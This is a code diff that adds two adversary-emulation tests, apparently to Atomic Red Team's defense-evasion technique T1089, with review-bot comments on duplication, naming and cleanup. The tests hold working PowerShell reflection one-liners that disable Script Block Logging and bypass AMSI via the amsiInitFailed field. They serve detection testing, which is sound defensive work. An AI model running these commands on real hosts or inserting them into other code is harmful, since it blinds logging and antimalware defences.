diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 745b8a88..5f387adb 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -30,6 +30,10 @@
- [Atomic Test #13 - Disable Arbitrary Security Windows Service](#atomic-test-13---disable-arbitrary-security-windows-service)
+- [Atomic Test #14 - Disable PowerShell Script Block Logging](#atomic-test-14---disable-powershell-script-block-logging)
+
+- [Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface](#atomic-test-15---powershell-bypass-of-antimalware-scripting-interface)
+
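Review bot: the two new table-of-contents entries are separated by blank `+` lines (the lines after each `- [Atomic Test #14 ...]` and `- [Atomic Test #15 ...]`), which the existing list does not use (compare the `#13` entry directly above). Drop the blank lines so the entries stay in the same tight list as tests #1 through #13.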
@@ -311,4 +315,50 @@ sc.exe config #{service_name} start= auto
net.exe start #{service_name}
```
+
+
+
+## Atomic Test #14 - Disable PowerShell Script Block Logging
+An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
+
+Credit to Matt Graeber (@mattifestation) for the research.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+```
+
+
+#### Cleanup Commands:
+```
+$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+```
+
+
+
+
+## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
+An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
+
+Credit to Matt Graeber (@mattifestation) for the research.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+```
+
+
+
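Review bot: Atomic Test #15 sets the same `amsiInitFailed` field that the already-listed "Atomic Test #11: AMSI Bypass - AMSI InitFailed" covers (see the `index.md` hunk in this patch), so it looks like a duplicate rather than a new test; either drop it or state in the description what it exercises that #11 does not. Two smaller points on this hunk: the cleanup for Test #14 writes `1` into both `EnableScriptBlockLogging` and `EnableScriptBlockInvocationLogging` without reading the original values first, so on a host where one of them was not enabled the "cleanup" leaves logging in a different state than it found it; reading the two values into variables before the test and restoring those would be more faithful. Both commands index straight into `$GroupPolicySettings['ScriptBlockLogging']` with no check that the key exists, so the description should state the precondition that the settings have already been cached in this process, and since the field is an in-process static cache, the cleanup only has an effect when it runs in the same PowerShell process as the test. Also, the new code fences carry no language tag and the section ends with three blank `+` lines; if this `.md` file is generated from `T1089.yaml`, regenerate it rather than hand-editing.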
diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml
index 4ede9312..86b5e4c7 100644
--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -200,4 +200,38 @@ atomic_tests:
sc.exe config #{service_name} start= disabled
cleanup_command: |
sc.exe config #{service_name} start= auto
- net.exe start #{service_name}
\ No newline at end of file
+ net.exe start #{service_name}
+
+- name: Disable PowerShell Script Block Logging
+ description: |
+ An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
+
+ Credit to Matt Graeber (@mattifestation) for the research.
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+ cleanup_command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+
+- name: PowerShell Bypass of AntiMalware Scripting Interface
+ description: |
+ An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
+
+ Credit to Matt Graeber (@mattifestation) for the research.
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
\ No newline at end of file
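Review bot: the hunk fixes the missing trailing newline on the old last line (`- net.exe start #{service_name}` / `\ No newline at end of file`) and then reintroduces the same problem on the new last line (`SetValue($null,$true)` with `\ No newline at end of file` after it); end the file with a newline. The name `PowerShell Bypass of AntiMalware Scripting Interface` misexpands the acronym: AMSI is the Antimalware Scan Interface, and the neighbouring tests already use the `AMSI Bypass - ...` naming, so `AMSI Bypass - ...` would also keep the index consistent. The second test has no `cleanup_command` while the first one does; if the field change is intended to last only for the session, say so in the description, otherwise add a cleanup that restores the field. Finally, the cleanup for the first test hard-codes `= 1` for both logging keys instead of restoring whatever values were present before the test ran.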
diff --git a/atomics/index.md b/atomics/index.md
index 057a98e3..e102fa0c 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -213,6 +213,8 @@
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
+ - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
+ - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
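Review bot: within this hunk, the new `Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface` sits three lines below `Atomic Test #11: AMSI Bypass - AMSI InitFailed`, which is the same `amsiInitFailed` technique under a different name; keeping both will confuse anyone reading the index. If #15 is retained, rename it to the `AMSI Bypass - ...` form used by #11 and #12 and expand AMSI correctly (Antimalware Scan Interface).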
diff --git a/atomics/index.yaml b/atomics/index.yaml
index b3bc0108..66aeab8e 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -6978,9 +6978,36 @@ defense-evasion:
command: |
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
- cleanup_command: |-
+ cleanup_command: |
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
+ - name: Disable PowerShell Script Block Logging
+ description: "An adversary may disable PowerShell Script Block Logging to avoid
+ leaving evidence. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+ cleanup_command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+ - name: PowerShell Bypass of AntiMalware Scripting Interface
+ description: "An adversary may bypass Windows Defender AMSI to execute malicious
+ PowerShell code. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
T1107:
technique:
x_mitre_data_sources:
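Review bot: the first change in this hunk (`cleanup_command: |-` becoming `cleanup_command: |`) touches the existing test #13 rather than the new tests and changes the block scalar's trailing-newline handling; if it is a side effect of regenerating `index.yaml` with a different YAML emitter, say so in the commit message, otherwise leave the existing entry alone. The two new `description:` strings also carry a trailing space before the newline (`evidence. \n\n` and `PowerShell code. \n\n`), which should be trimmed in the source `T1089.yaml` so the generated index does not preserve it. The duplicate-of-test-#11 and AMSI-naming points raised on the `index.md` hunk apply to the `PowerShell Bypass of AntiMalware Scripting Interface` entry here as well.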
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 978851a6..cf69e36c 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -43,6 +43,8 @@
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
+ - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
+ - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)